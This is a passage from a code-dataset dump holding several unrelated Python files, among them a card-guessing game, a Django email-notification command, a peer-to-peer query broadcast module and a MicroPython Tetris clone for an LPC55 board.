')\r\n Choice = Choice.lower()\r\n if Choice == \"yes\":\r\n Choice = \"y\"\r\n if Choice == \"no\":\r\n Choice = \"n\"\r\n return Choice\r\n\r\ndef DisplayEndOfGameMessage(Score):\r\n print()\r\n print('GAME OVER!')\r\n print('Your score was', Score)\r\n if Score == 51:\r\n print('WOW! You completed a perfect game.')\r\n print()\r\n\r\ndef DisplayCorrectGuessMessage(Score):\r\n print()\r\n print('Well done! You guessed correctly.')\r\n print('Your score is now ', Score, '.', sep='')\r\n print()\r\n\r\ndef ResetRecentScores(RecentScores):\r\n for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n RecentScores[Count].Name = ''\r\n RecentScores[Count].Score = 0\r\n\r\ndef DisplayRecentScores(RecentScores):\r\n print()\r\n print('Recent Scores: ')\r\n print()\r\n print(\"{0}{1:>14}{2:>14}\".format(\"Name\",\"Score\",\"Date\"))\r\n for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n print(\"{0}{1:>{2}}{3:>14}\".format(RecentScores[Count].Name, RecentScores[Count].Score,18-(len(RecentScores[Count].Name)), RecentScores[Count].Date))\r\n print()\r\n print('Press the Enter key to return to the main menu')\r\n input()\r\n print()\r\n\r\ndef UpdateRecentScores(RecentScores, Score):\r\n PlayerName = GetPlayerName()\r\n FoundSpace = False\r\n Count = 1\r\n while (not FoundSpace) and (Count <= NO_OF_RECENT_SCORES):\r\n if RecentScores[Count].Name == '':\r\n FoundSpace = True\r\n else:\r\n Count = Count + 1\r\n if not FoundSpace:\r\n for Count in range(1, NO_OF_RECENT_SCORES):\r\n RecentScores[Count].Name = RecentScores[Count + 1].Name\r\n RecentScores[Count].Score = RecentScores[Count + 1].Score\r\n Count = NO_OF_RECENT_SCORES\r\n RecentScores[Count].Name = PlayerName\r\n RecentScores[Count].Score = Score\r\n DateNow = datetime.date.today()\r\n RecentScores[Count].Date = DateNow.strftime(\"%d/%m/%y\")\r\n\r\ndef PlayGame(Deck, RecentScores):\r\n LastCard = TCard()\r\n NextCard = TCard()\r\n GameOver = False\r\n GetCard(LastCard, Deck, 0)\r\n DisplayCard(LastCard)\r\n NoOfCardsTurnedOver = 1\r\n while (NoOfCardsTurnedOver < 52) and (not GameOver):\r\n GetCard(NextCard, Deck, NoOfCardsTurnedOver)\r\n Choice = ''\r\n while (Choice != 'y') and (Choice != 'n'):\r\n Choice = GetChoiceFromUser()\r\n DisplayCard(NextCard)\r\n NoOfCardsTurnedOver = NoOfCardsTurnedOver + 1\r\n Higher = IsNextCardHigher(LastCard, NextCard, AceHigh)\r\n if (Higher and Choice == 'y') or (not Higher and Choice == 'n'):\r\n DisplayCorrectGuessMessage(NoOfCardsTurnedOver - 1)\r\n LastCard.Rank = NextCard.Rank\r\n LastCard.Suit = NextCard.Suit\r\n else:\r\n GameOver = True\r\n if GameOver:\r\n DisplayEndOfGameMessage(NoOfCardsTurnedOver - 2)\r\n Scoreboard = input(\"Would you like to add your score to the high score table? 
(Y/N): \")\r\n Scoreboard = Scoreboard.lower()\r\n if Scoreboard == \"y\":\r\n UpdateRecentScores(RecentScores, NoOfCardsTurnedOver - 2)\r\n \r\n else:\r\n DisplayEndOfGameMessage(51)\r\n UpdateRecentScores(RecentScores, 51)\r\n\r\nif __name__ == '__main__':\r\n for Count in range(1, 53):\r\n Deck.append(TCard())\r\n for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n RecentScores.append(TRecentScore())\r\n Choice = ''\r\n while Choice != 'q':\r\n LoadScores()\r\n DisplayMenu()\r\n Choice = GetMenuChoice()\r\n if Choice == '1':\r\n LoadDeck(Deck)\r\n ShuffleDeck(Deck)\r\n PlayGame(Deck, RecentScores)\r\n elif Choice == '2':\r\n LoadDeck(Deck)\r\n PlayGame(Deck, RecentScores)\r\n elif Choice == '3':\r\n BubbleSortScores(RecentScores)\r\n DisplayRecentScores(RecentScores)\r\n elif Choice == '4':\r\n ResetRecentScores(RecentScores)\r\n elif Choice == \"5\":\r\n DisplayOptions()\r\n OptionChoice = GetOptionChoice()\r\n SetOptions(OptionChoice)\r\n elif Choice == \"6\":\r\n SaveScores(RecentScores)\r\n","sub_path":"Skeleton Program.py","file_name":"Skeleton Program.py","file_ext":"py","file_size_in_byte":10305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"82441446","text":"#!/usr/bin/python3\n\"\"\"\nThis is the \"lazy_matrix_mul\" module.\n\nThe lazy_matrix_mul module does matrix multiplication using numpy.dot\n\"\"\"\n\n\nimport numpy as np\n\n\ndef lazy_matrix_mul(m_a, m_b):\n \"\"\"\n Takes in two Matrix and Multiplies them\n Return: a new matrix\n \"\"\"\n if not m_a:\n raise ValueError(\"m_a can't be empty\")\n if not m_b:\n raise ValueError(\"m_b can't be empty\")\n if not isinstance(m_a, list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b, list):\n raise TypeError(\"m_b must be a list\")\n if not isinstance(m_a[0], list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b[0], list):\n raise TypeError(\"m_b must be a list\")\n row_len = len(m_a[0])\n for i in m_a:\n if not len(i) == row_len:\n raise TypeError(\"each row of m_a must should be of the same size\")\n for j in i:\n if not (isinstance(j, int) or isinstance(j, float)):\n raise TypeError(\"m_a should contain only integers or floats\")\n row_len = len(m_b[0])\n for i in m_b:\n if not len(i) == row_len:\n raise TypeError(\"each row of m_b must should be of the same size\")\n for j in i:\n if not (isinstance(j, int) or isinstance(j, float)):\n raise TypeError(\"m_b should contain only integers or floats\")\n\n if not len(m_a[0]) == len(m_b):\n raise ValueError(\"m_a and m_b can't be multiplied\")\n m_c = np.dot(m_a, m_b)\n return m_c\n","sub_path":"0x06-python-test_driven_development/101-lazy_matrix_mul.py","file_name":"101-lazy_matrix_mul.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"187507800","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\nfrom django.core.mail import get_connection, EmailMultiAlternatives\nfrom django.contrib.sites.models import Site\nfrom django.core.urlresolvers import reverse\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import ugettext as _\n\nfrom users.models import UserProfile\nimport time\n\n\nclass Command(BaseCommand):\n help = \"Send new mail notifications via email\"\n\n option_list = BaseCommand.option_list\n\n def handle(self, **options):\n notify_messages = []\n for user_profile in UserProfile.objects.exclude(send_notify_messages__isnull=True):\n user = user_profile.user\n unread_count = user_profile.send_notify_messages.count()\n\n user_profile.send_notify_messages.clear()\n\n subject = _(u'{0}, у вас есть новые сообщения').format(user.first_name)\n\n domain = Site.objects.get_current().domain\n mail_url = 'http://' + domain + reverse('mail.views.mail_page')\n unread_count_string = get_string(unread_count)\n\n plain_text = _(u'Здравствуйте, {0}.') + '\\n\\n' + \\\n _(u'У вас {1} {2}.') + '\\n' + \\\n _(u'Посмотреть сообщения:') + '\\n' + \\\n u'{3}\\n\\n' + \\\n u'-- \\n' + \\\n _(u'С уважением,') + '\\n' + \\\n _(u'команда Anytask.')\n plain_text = plain_text.format(user.first_name, unread_count, unread_count_string, mail_url)\n\n context = {\n \"user\": user,\n \"user_profile\": user_profile,\n \"domain\": 'http://' + domain,\n \"unread_count\": unread_count,\n \"unread_count_string\": unread_count_string\n }\n html = render_to_string('email_notification_mail.html', context)\n\n from_email = settings.DEFAULT_FROM_EMAIL\n notify_messages.append((subject, plain_text, html, from_email, [user.email]))\n\n if notify_messages:\n send_mass_mail_html(notify_messages)\n time.sleep(1)\n\n\ndef get_string(num):\n if 11 <= num <= 14:\n return _(u\"новых сообщений\")\n elif str(num)[-1] == \"1\":\n return _(u\"новое сообщение\")\n elif str(num)[-1] in [\"2\", \"3\", \"4\"]:\n return _(u\"новых с��общения\")\n else:\n return _(u\"новых сообщений\")\n\n\ndef send_mass_mail_html(datatuple, fail_silently=False, user=None, password=None, connection=None):\n connection = connection or \\\n get_connection(username=user, password=password, fail_silently=fail_silently)\n messages = []\n for subject, plain_text, html, from_email, recipient in datatuple:\n message = EmailMultiAlternatives(subject, plain_text, from_email, recipient)\n message.attach_alternative(html, 'text/html')\n messages.append(message)\n\n return connection.send_messages(messages)\n","sub_path":"anytask/mail/management/commands/send_mail_notifications.py","file_name":"send_mail_notifications.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"147999076","text":"class User():\n def __init__(self, firstname, lastname, sex, age):\n self.firstname = firstname\n self.lastname = lastname\n self.sex = sex\n self.age = age\n self.fullname = self.firstname+\" \"+self.lastname\n self.login_attempts = 0\n\n def describe_user(self):\n print(\"User Info: \\n\")\n print(\"Username: \"+self.fullname+\"\\tSex: \" + self.sex + \n \"\\tAge: \"+str(self.age))\n\n def greet_user(self, greet):\n print(greet + self.fullname)\n\n\n def reset_login_attempts(self):\n self.login_attempts = 0\n\n\n def increment_login_attempts(self):\n if self.login_attempts<3:\n print(\"login\")\n self.login_attempts+=1\n \n else:\n print('You have got 3 times to attemp to login.reset to 0')\n self.reset_login_attempts()\n\n\n\n\nuser1 = User(\"wang\", \"li\", \"woman\", 35)\nuser1.greet_user(\"Hello \")\nuser1.describe_user()\nuser1.increment_login_attempts()\n\n\nuser2 = User(\"Niu\", \"Xiaodong\", \"Man\", 48)\nuser2.greet_user(\"How are you,\")\nuser2.describe_user()\n","sub_path":"Chapter09/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"563670127","text":"import os\n\n\ndef run(bot, chat_id, user, keyConfig, message, totalResults=1):\n try:\n available_commands = [f for f in os.listdir(\"./commands\") if f.endswith(\".py\") and f != \"__init__.py\"]\n bot.sendMessage(chat_id=chat_id, text=\"I know:\\n\" + \"\\n\".join(map(lambda x: x[:-3], available_commands)))\n return True\n except:\n bot.sendMessage(chat_id=chat_id, text='I\\'m sorry ' + (user if not user == '' else 'Dave') +\n ', I\\'m afraid there\\'s no helping you.')","sub_path":"commands/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"533381002","text":"import socket\nimport sys\nimport pickle\nfrom time import sleep\nfrom queue import Queue\nfrom _thread import *\nimport threading\nfrom threading import Thread\nimport superPeer\n\nsys.path.append('.\\\\LinearTopology')\n\nimport GLOBALS\nimport utility\n\nresponse = [[]]\nnum = 0\n\ndef addMessage():\n\t\"\"\"Initializes the Reponse list to make sure no old responses were left in it.\n\n\t\tArgs:\n\t\t\tNone\n\n\t\tReturns:\n\t\t\tNone\n\n\t\tGlobals:\n\t\t\tresponse - List to store the responses from the other Super Peers.\n\n\t\tCalls:\n\t\t\tNone\n\n\t\tCalled by:\n\t\t\tbroadcastMsg\n\n\t\"\"\"\n\tglobal response\n\tglobal num\n\tif num != 0:\n\t\tresponse.append([])\n\tfor x in GLOBALS.SUPER_PEER_LIST:\n\t\tresponse[num].append([])\n\tnum +=1\n\ndef broadcastQueryThread(msg, response, id, index):\n\t\"\"\"Sends a message to all other Super Peers.\n\n\t\tArgs:\n\t\t\tfilename (Str) - The name of the file to be searched for.\n\t\t\tresponse (List) - List that will store all of the responses form the super peers.\n\t\t\tid (int) - Then index for the list to put all of the data in\n\t\t\tindex (Int) - The index of response to store the answer from the Super Peer in.\n\n\t\tReturns:\n\t\t\tA list of leaf nodes that have a the file.\n\n\t\tGlobals:\n\n\t\tCalls:\n\n\t\tCalled by:\n\t\t\tbroadcastMsg()\n\t\"\"\"\n\tip = GLOBALS.SUPER_PEER_LIST[index][1]\n\tport = int(GLOBALS.SUPER_PEER_LIST[index][2])\n\thits = []\n\ttry:\n\t\tsock = socket.socket()\n\t\tsock.connect((ip, port))\n\t\tmsg = pickle.dumps(msg)\n\t\tsock.send(msg)\n\t\tdata = sock.recv(1024)\n\t\tdata = pickle.loads(data)\n\t\tif data is not -1:\n\t\t\tresponse[id][index] = data\n\t\t\tprint(\"[info] Broadcast lib: Response from Super Peer: \" + str(index) + \" : \" + str(data))\n\t\telse:\n\t\t\tprint(\"[info] Broadcast Lib: No hits\")\n\texcept socket.error as err:\n\t\tprint(\"[ERROR] Broadcast lib: Error connecting \" + str(ip) + \":\" + str(port))\n\tsock.close()\n\treturn\n\ndef broadcastQuery(msg):\n\t\"\"\"Spawns threads to send out the query to all other super peers\n\t\t\n\t\tArgs:\n\t\t\tmsg (query) - query object to get broadcasted\n\t\t\n\t\tReturns:\n\t\t\tresponse[msg.id] - list of responses from the other Super Peers\n\t\t\n\t\tGlobals:\n\t\t\tnum (Int) - used for msg ID's \n\t\t\tresponse (List) - stores the responses form the other Super Peers\n\t\t\t\n\t\tCalls:\n\t\t\tbroadcastQueryThread\n\t\t\n\t\tCalled by:\n\t\t\tsuperPeer.broadcastSearch\n\t\"\"\"\n\tthreads = []\n\tglobal num\n\tmsg.id = num\n\tglobal response\n\taddMessage()\n\tfor x in range(len(GLOBALS.SUPER_PEER_LIST)):\n\t\tif x == GLOBALS.SUPER_PEER_ID:\n\t\t\tcontinue\n\t\tproc = Thread(target = broadcastQueryThread, args = [msg, response, msg.id, x])\n\t\tproc.start()\n\t\tthreads.append(proc)\n\n\tfor proc in threads:\n\t\tproc.join()\n\tprint(\"All responses received\")\n\treturn response[msg.id]\n\t\ndef broadcastQueryHandler(con, msg):\n\t\"\"\"Handles query requests from other Super Peers\n\t\n\t\tArgs:\n\t\t\tcon (socket.socket) - socket object that holds the connection with the other Super Peer\n\t\t\tmsg (Query) - Query Object that holds the info for what file to look for\n\t\t\t\n\t\tReturns:\n\t\t\tvoid - Sends back a list of QueryHit objects if the file was found\n\t\t\t\n\t\tGlobals:\n\t\t\t\n\t\tCalls:\n\t\t\tsuperPeer.searchLocal \n\n\t\tCalled By:\n\t\t\tsuperPeer.superPeerThreadHandler\n\t\"\"\"\n\tfilename = msg.fname\n\tpeers = []\n\tprint(\"[info] Broadcast lib: Searching for file: \" + 
filename)\n\tpeers = superPeer.searchLocal(filename)\n\tif peers:\n\t\ttry:\n\t\t\tmsg = pickle.dumps(peers)\n\t\t\tcon.sendall(msg)\n\t\texcept:\n\t\t\tprint(\"[ERROR] Broadcast lib: Connection Failed\")\n\telse:\n\t\ttry:\n\t\t\tcon.send(pickle.dumps(-1))\n\t\texcept:\n\t\t\tprint(\"[ERROR] Broadcast lib: Connection Failed\")\n\treturn\n","sub_path":"Homework/PA3/Experiment/PA3/SuperPeer/bin/broadcastTopology/broadcast.py","file_name":"broadcast.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
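One caveat worth noting on the broadcast record above: it reads each pickled reply with a single sock.recv(1024), so replies larger than one segment would be truncated. A common remedy (a sketch, not part of the source) is to length-prefix every message:

import pickle
import struct

def send_msg(sock, obj):
    payload = pickle.dumps(obj)
    sock.sendall(struct.pack('!I', len(payload)) + payload)

def recv_msg(sock):
    length = struct.unpack('!I', recv_exact(sock, 4))[0]
    return pickle.loads(recv_exact(sock, length))

def recv_exact(sock, n):
    # keep reading until exactly n bytes have arrived
    data = b''
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise ConnectionError('socket closed mid-message')
        data += chunk
    return data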
+{"seq_id":"491553199","text":"from lib.database.bonds.munibonds import MuniBonds\nfrom lib.timeseries.model import TimeSeries\n\n\ndef main():\n ts = TimeSeries()\n ts.create_bonds()\n print(ts._summary_bonds.shape)\n ts.create_multivariate_ts(size=\"all\")\n\n cusip = '74514LB89'\n n = 5\n similar = ts.get_similar(cusip, n)\n\n print(similar)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"sparse-rnn/testcodes/database/TestGetSimilar.py","file_name":"TestGetSimilar.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"504938606","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nZetCode PyQt5 tutorial\nThis is a Tetris game clone.\n\nAuthor: Jan Bodnar\nWebsite: zetcode.com\nLast edited: August 2017\n\"\"\"\n\n# from PyQt5.QtWidgets import QMainWindow, QFrame, QDesktopWidget, QApplication\n# from PyQt5.QtCore import Qt, QBasicTimer, pyqtSignal\n# from PyQt5.QtGui import QPainter, QColor\nimport random\nimport machine\nfrom lpc55 import Pin, SPI\nfrom lpc55 import CTimer\nfrom display import LCD154\n\nimport time\n\nFIELD_X = 70\nFIELD_Y = 0\n\nFIELD_WIDTH =100\nFIELD_HEIGHT=240\n\nKey_P = b'p'\nKey_Left = b'j'\nKey_Right = b'l'\nKey_Down = b'k'\nKey_Up = b'i'\nKey_Space = b' '\nKey_D = b'd'\n\nKeyStruct = {\n 'PIO1_18': [Key_Down, 0, None], # rotateRight, [key-value, ticks, Pin obj]\n 'PIO1_28': [Key_Space, 0, None], # drop down\n 'PIO1_31': [Key_Left, 0, None], # move left\n 'PIO1_29': [Key_Right, 0, None], # move right\n 'PIO1_30': [Key_Up, 0, None], # rotateLeft\n}\nDEBOUNCE_MS = 120\n\nWHITE = const(0xFFFF)\nBLACK = const(0x0000)\nBLUE = const(0x001F)\nBRED = const(0XF81F)\nGRED = const(0XFFE0)\nRED = const(0xF800)\nMAGENTA=const(0xF81F)\nGREEN = const(0x07E0)\nCYAN = const(0x07FF)\nYELLOW= const(0xFFE0)\nBROWN = const(0XBC40)\nBRRED = const(0XFC07)\nGRAY = const(0X8430)\n\nclass Tetris(object):\n Speed = 300\n\n def __init__(self, ks, lcd):\n\n # self.initUI()\n self.key_hand = ks\n self.tboard = Board(self)\n self.tboard.set_painter(lcd.lcd)\n self.tboard.start()\n\n def timerCB(self, hundred_ms):\n # print('hundred_ms = ', hundred_ms)\n keys = self.key_hand.Key_Values\n for k in keys:\n self.tboard.keyPressEvent(k)\n self.key_hand.Key_Values.clear()\n\n if hundred_ms % (self.Speed//100) == 0:\n self.tboard.timerEvent()\n\nclass Board():\n# msg2Statusbar = pyqtSignal(str)\n BoardWidth = 10\n BoardHeight = 24\n\n def __init__(self, parent):\n # super().__init__(parent)\n self.initBoard()\n\n def initBoard(self):\n '''initiates board'''\n # self.timer = QBasicTimer()\n self.isWaitingAfterLine = False\n\n self.curX = 0\n self.curY = 0\n self.numLinesRemoved = 0\n self.board = []\n\n # self.setFocusPolicy(Qt.StrongFocus)\n self.isStarted = False\n self.isPaused = False\n self.clearBoard()\n\n def set_painter(self, lcd):\n # color = lambda x: ((x & 0xF80000) >> 8) | ((x & 0xFC00) >> 5) | (( x & 0xF8) >> 3)\n # Colors = (0x0, 0xCB2C, 0x666C, 0x6339, 0xCE6C, 0xCB39, 0x6679, 0xDD00)\n Colors = (BLACK, RED, GREEN, BLUE, YELLOW, MAGENTA, CYAN, WHITE)\n self.painter = lcd.framebuf(FIELD_X-2, FIELD_Y, FIELD_WIDTH+2*2, FIELD_HEIGHT, bits=4, lut=Colors)\n self.painter.clear(0)\n\n def shapeAt(self, x, y):\n '''determines shape at the board position'''\n try:\n return self.board[(y * Board.BoardWidth) + x]\n except IndexError:\n return Tetrominoe.NoShape\n\n def setShapeAt(self, x, y, shape):\n '''sets a shape at the board'''\n\n self.board[(y * Board.BoardWidth) + x] = shape\n\n\n def squareWidth(self):\n '''returns the width of one square'''\n\n return FIELD_WIDTH // Board.BoardWidth\n # return self.contentsRect().width() // Board.BoardWidth\n\n def squareHeight(self):\n '''returns the height of one square'''\n return FIELD_HEIGHT // Board.BoardHeight\n # return self.contentsRect().height() // Board.BoardHeight\n\n def start(self):\n '''starts game'''\n\n if self.isPaused:\n return\n\n self.isStarted = True\n self.isWaitingAfterLine = False\n self.numLinesRemoved = 0\n self.clearBoard()\n\n # self.msg2Statusbar.emit(str(self.numLinesRemoved))\n print(str(self.numLinesRemoved))\n\n 
self.newPiece()\n\n # self.timer.start(Board.Speed, self)\n\n def pause(self):\n '''pauses game'''\n\n if not self.isStarted:\n return\n\n self.isPaused = not self.isPaused\n\n if self.isPaused:\n # self.timer.stop()\n # self.msg2Statusbar.emit(\"paused\")\n print('Paused')\n\n else:\n # self.timer.start(Board.Speed, self)\n # self.msg2Statusbar.emit(str(self.numLinesRemoved))\n print(str(self.numLinesRemoved))\n\n self.update()\n\n\n# def paintEvent(self, event):\n def update(self):\n '''paints all shapes of the game'''\n\n # print(\".\",end='')\n # painter = QPainter(self)\n # rect = self.contentsRect()\n self.painter.clear(0)\n\n # boardTop = rect.bottom() - Board.BoardHeight * self.squareHeight()\n boardTop = FIELD_HEIGHT - Board.BoardHeight * self.squareHeight()\n\n for i in range(Board.BoardHeight):\n for j in range(Board.BoardWidth):\n shape = self.shapeAt(j, Board.BoardHeight - i - 1)\n\n if shape != Tetrominoe.NoShape:\n self.drawSquare(self.painter,\n 2 + j * self.squareWidth(),\n # rect.left() + j * self.squareWidth(),\n boardTop + i * self.squareHeight(), shape)\n\n if self.curPiece.shape() != Tetrominoe.NoShape:\n # print(\"%d\" % self.curPiece.shape(), end='')\n for i in range(4):\n x = self.curX + self.curPiece.x(i)\n y = self.curY - self.curPiece.y(i)\n # self.drawSquare(painter, rect.left() + x * self.squareWidth(),\n self.drawSquare(self.painter, 2 + x * self.squareWidth(),\n boardTop + (Board.BoardHeight - y - 1) * self.squareHeight(),\n self.curPiece.shape())\n\n if not self.isStarted:\n self.painter.color(4, 1)\n self.painter.string(20, 80, 'Game', font=32)\n self.painter.string(20, 80+32, 'Over', font=32)\n self.painter.show()\n # for pt in self.painter:\n # pt.dma_refresh()\n\n def keyPressEvent(self, key):\n '''processes key press events'''\n if not self.isStarted and key == Key_Space:\n key = Key_P\n if not self.isStarted and key == Key_P: # Ping add this for re-start\n self.isPaused = False\n self.start()\n return\n\n if not self.isStarted or self.curPiece.shape() == Tetrominoe.NoShape:\n # super(Board, self).keyPressEvent(event)\n return\n\n # key = event.key()\n\n if key == Key_P:\n self.pause()\n return\n\n if self.isPaused:\n return\n\n elif key == Key_Left:\n self.tryMove(self.curPiece, self.curX - 1, self.curY)\n\n elif key == Key_Right:\n self.tryMove(self.curPiece, self.curX + 1, self.curY)\n\n elif key == Key_Down:\n self.tryMove(self.curPiece.rotateRight(), self.curX, self.curY)\n\n elif key == Key_Up:\n self.tryMove(self.curPiece.rotateLeft(), self.curX, self.curY)\n\n elif key == Key_Space:\n self.dropDown()\n\n elif key == Key_D:\n self.oneLineDown()\n\n\n def timerEvent(self):\n '''handles timer event'''\n\n if self.isPaused:\n return # Do nothing when paused\n\n if self.isWaitingAfterLine:\n self.isWaitingAfterLine = False\n self.newPiece()\n else:\n self.oneLineDown()\n\n def clearBoard(self):\n '''clears shapes from the board'''\n\n self.board.clear() # Ping add this. 
Important for re-start\n for i in range(Board.BoardHeight * Board.BoardWidth):\n self.board.append(Tetrominoe.NoShape)\n\n\n def dropDown(self):\n '''drops down a shape'''\n newY = self.curY\n\n while newY > 0:\n if not self.tryMove(self.curPiece, self.curX, newY - 1):\n break\n newY -= 1\n self.pieceDropped()\n\n def oneLineDown(self):\n '''goes one line down with a shape'''\n\n if not self.tryMove(self.curPiece, self.curX, self.curY - 1):\n self.pieceDropped()\n\n\n def pieceDropped(self):\n '''after dropping shape, remove full lines and create new shape'''\n\n for i in range(4):\n\n x = self.curX + self.curPiece.x(i)\n y = self.curY - self.curPiece.y(i)\n self.setShapeAt(x, y, self.curPiece.shape())\n\n self.removeFullLines()\n\n if not self.isWaitingAfterLine:\n self.newPiece()\n\n\n def removeFullLines(self):\n '''removes all full lines from the board'''\n\n numFullLines = 0\n rowsToRemove = []\n\n for i in range(Board.BoardHeight):\n\n n = 0\n for j in range(Board.BoardWidth):\n if not self.shapeAt(j, i) == Tetrominoe.NoShape:\n n = n + 1\n\n if n == 10:\n rowsToRemove.append(i)\n\n rowsToRemove.reverse()\n\n for m in rowsToRemove:\n\n for k in range(m, Board.BoardHeight):\n for l in range(Board.BoardWidth):\n self.setShapeAt(l, k, self.shapeAt(l, k + 1))\n\n numFullLines = numFullLines + len(rowsToRemove)\n\n if numFullLines > 0:\n\n self.numLinesRemoved = self.numLinesRemoved + numFullLines\n # self.msg2Statusbar.emit(str(self.numLinesRemoved))\n print(str(self.numLinesRemoved))\n\n self.isWaitingAfterLine = True\n self.curPiece.setShape(Tetrominoe.NoShape)\n self.update()\n\n\n def newPiece(self):\n '''creates a new shape'''\n\n self.curPiece = Shape()\n self.curPiece.setRandomShape()\n self.curX = Board.BoardWidth // 2 + 1\n self.curY = Board.BoardHeight - 1 + self.curPiece.minY()\n\n if not self.tryMove(self.curPiece, self.curX, self.curY):\n\n self.curPiece.setShape(Tetrominoe.NoShape)\n # self.timer.stop()\n # self.isStarted = False\n # self.msg2Statusbar.emit(\"Game over\")\n if self.isStarted:\n self.isStarted = False\n print(\"Game over\")\n\n\n def tryMove(self, newPiece, newX, newY):\n '''tries to move a shape'''\n\n for i in range(4):\n\n x = newX + newPiece.x(i)\n y = newY - newPiece.y(i)\n\n if x < 0 or x >= Board.BoardWidth or y < 0 or y >= Board.BoardHeight:\n return False\n\n if self.shapeAt(x, y) != Tetrominoe.NoShape:\n return False\n\n self.curPiece = newPiece\n self.curX = newX\n self.curY = newY\n self.update()\n\n return True\n\n def drawSquare(self, painter, x, y, shape):\n '''draws a square of a shape'''\n \n BLOCK = b'\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF\\x87\\x03\\x87\\x03\\x87\\x03\\x87\\x03\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF'\n # BLOCK = b'\\x00\\x00' * 10\n painter.color(0, shape)\n painter.monoicon(x, y, 10, 10, BLOCK)\n\nclass Tetrominoe(object):\n\n NoShape = 0\n ZShape = 1\n SShape = 2\n LineShape = 3\n TShape = 4\n SquareShape = 5\n LShape = 6\n MirroredLShape = 7\n\n\nclass Shape(object):\n\n coordsTable = (\n ((0, 0), (0, 0), (0, 0), (0, 0)),\n ((0, -1), (0, 0), (-1, 0), (-1, 1)),\n ((0, -1), (0, 0), (1, 0), (1, 1)),\n ((0, -1), (0, 0), (0, 1), (0, 2)),\n ((-1, 0), (0, 0), (1, 0), (0, 1)),\n ((0, 0), (1, 0), (0, 1), (1, 1)),\n ((-1, -1), (0, -1), (0, 0), (0, 1)),\n ((1, -1), (0, -1), (0, 0), (0, 1))\n )\n\n def __init__(self):\n\n self.coords = [[0,0] for i in range(4)]\n self.pieceShape = Tetrominoe.NoShape\n\n self.setShape(Tetrominoe.NoShape)\n\n\n def shape(self):\n '''returns shape'''\n\n return self.pieceShape\n\n\n def setShape(self, shape):\n 
'''sets a shape'''\n\n table = Shape.coordsTable[shape]\n\n for i in range(4):\n for j in range(2):\n self.coords[i][j] = table[i][j]\n\n self.pieceShape = shape\n\n\n def setRandomShape(self):\n '''chooses a random shape'''\n\n self.setShape(random.randint(1, 7))\n\n\n def x(self, index):\n '''returns x coordinate'''\n\n return self.coords[index][0]\n\n\n def y(self, index):\n '''returns y coordinate'''\n\n return self.coords[index][1]\n\n\n def setX(self, index, x):\n '''sets x coordinate'''\n\n self.coords[index][0] = x\n\n\n def setY(self, index, y):\n '''sets y coordinate'''\n\n self.coords[index][1] = y\n\n\n def minX(self):\n '''returns min x value'''\n\n m = self.coords[0][0]\n for i in range(4):\n m = min(m, self.coords[i][0])\n\n return m\n\n\n def maxX(self):\n '''returns max x value'''\n\n m = self.coords[0][0]\n for i in range(4):\n m = max(m, self.coords[i][0])\n\n return m\n\n\n def minY(self):\n '''returns min y value'''\n\n m = self.coords[0][1]\n for i in range(4):\n m = min(m, self.coords[i][1])\n\n return m\n\n\n def maxY(self):\n '''returns max y value'''\n\n m = self.coords[0][1]\n for i in range(4):\n m = max(m, self.coords[i][1])\n\n return m\n\n\n def rotateLeft(self):\n '''rotates shape to the left'''\n\n if self.pieceShape == Tetrominoe.SquareShape:\n return self\n\n result = Shape()\n result.pieceShape = self.pieceShape\n\n for i in range(4):\n\n result.setX(i, self.y(i))\n result.setY(i, -self.x(i))\n\n return result\n\n\n def rotateRight(self):\n '''rotates shape to the right'''\n\n if self.pieceShape == Tetrominoe.SquareShape:\n return self\n\n result = Shape()\n result.pieceShape = self.pieceShape\n\n for i in range(4):\n\n result.setX(i, -self.y(i))\n result.setY(i, self.x(i))\n\n return result\n\n### Add this class to handle all keys ###########################\n\nclass Keys(object):\n Key_Values = []\n def __init__(self):\n for name in KeyStruct:\n pin = Pin(name, Pin.IN, pull=Pin.PULL_UP)\n pin.irq(Keys.key_cb, Pin.IRQ_FALLING)\n KeyStruct[name][1] = time.ticks_ms()\n KeyStruct[name][2] = pin\n\n def read_keys(self):\n keys = list(Keys.Key_Values)\n Keys.Key_Values.clear()\n return keys\n\n @staticmethod\n def key_cb(pin):\n now = time.ticks_ms()\n name = pin.name()\n key = KeyStruct[name]\n # debounce = DEBOUNCE_MS*2 if key[0] == Key_Space else DEBOUNCE_MS\n if now - key[1] > DEBOUNCE_MS: # Check ticks\n if key[0] not in Keys.Key_Values and pin.value() == 0:\n Keys.Key_Values.append(key[0])\n # print(name)\n key[1] = now\n\nclass Panel():\n def __init__(self, id, rst, cs=None):\n lcd_spi = SPI(id, SPI.MASTER, bits=8, baudrate=50000000, polarity=1, phase=1)\n lcd_rst= Pin(rst, Pin.OUT, pull=Pin.PULL_UP, value=1)\n if cs:\n lcd_cs =Pin(cs, Pin.OUT, pull=Pin.PULL_UP, value=0)\n self.lcd = LCD154(lcd_spi, lcd_rst)\n if not cs:\n self.lcd.orientation(2)\n 